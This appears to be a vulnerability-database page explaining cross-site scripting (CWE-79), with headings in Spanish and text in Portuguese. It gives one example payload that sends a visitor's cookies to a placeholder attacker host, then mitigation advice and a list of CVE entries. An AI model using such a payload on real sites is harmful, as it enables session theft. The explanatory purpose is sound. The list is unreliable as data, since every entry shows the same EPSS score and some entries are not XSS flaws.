Fallos del tipo CWE-79

28.639 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-24293—NextGEN Gallery Pro < 3.1.11 - Reflected Cross-Site Scripting (XSS)EPSS 0.9%CVE-2024-1985MEDIUMSimple Membership <= 4.4.2 - Unauthenticated Stored Self-Based Cross-Site ScriptingEPSS 0.9%CVE-2021-25100—Give < 2.17.3 - Reflected Cross-Site Scripting via Donation Forms DashboardEPSS 0.9%CVE-2022-0680—Plezi < 1.0.3 - Unauthenticated Stored XSSEPSS 0.9%CVE-2022-0780—SearchIQ < 3.9 - Unauthenticated Stored XSSEPSS 0.9%CVE-2022-0628—AP Mega Menu < 3.0.8 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2022-23912—AP Custom Testimonial < 1.4.8 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2022-1169—Careerfy < 3.9.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)EPSS 0.9%CVE-2022-0640—AP Pricing Tables Lite < 1.1.5 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2022-24717MEDIUMCross Site Scripting (XSS) in ssr-pagesEPSS 0.9%CVE-2022-0252—Give < 2.17.3 - Reflected Cross-Site Scripting via Import ToolEPSS 0.9%CVE-2022-0818—Coupon Affiliates < 4.16.4.5 - Unauthenticated Stored XSSEPSS 0.9%CVE-2022-0380MEDIUMFotobook <= 3.2.3 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2018-19904MEDIUMPersistent XSS exists in XSLT CMS via the create/?action=items.edit&type=Page "body" field.EPSS 0.9%CVE-2021-25959MEDIUMOpenCRX - Reflected Cross-Site Scripting in Password Reset FunctionalityEPSS 0.9%CVE-2026-70332CRITICALMicrosoft Office SharePoint Spoofing VulnerabilityEPSS 0.9%CVE-2026-57104HIGHAzure Storage Explorer Elevation of Privilege VulnerabilityEPSS 0.9%CVE-2026-55008CRITICALMicrosoft Exchange Server Spoofing VulnerabilityEPSS 0.9%CVE-2017-16008—i18next is a language translation framework. Because of how the interpolation is implemented, making replacements from the dictionary one atEPSS 0.9%CVE-2019-13422—Search Guard Kibana Plugin versions before 5.6.8-7 and before 6.x.y-12 had an issue that an attacker can redirect the user to a potentially EPSS 0.9%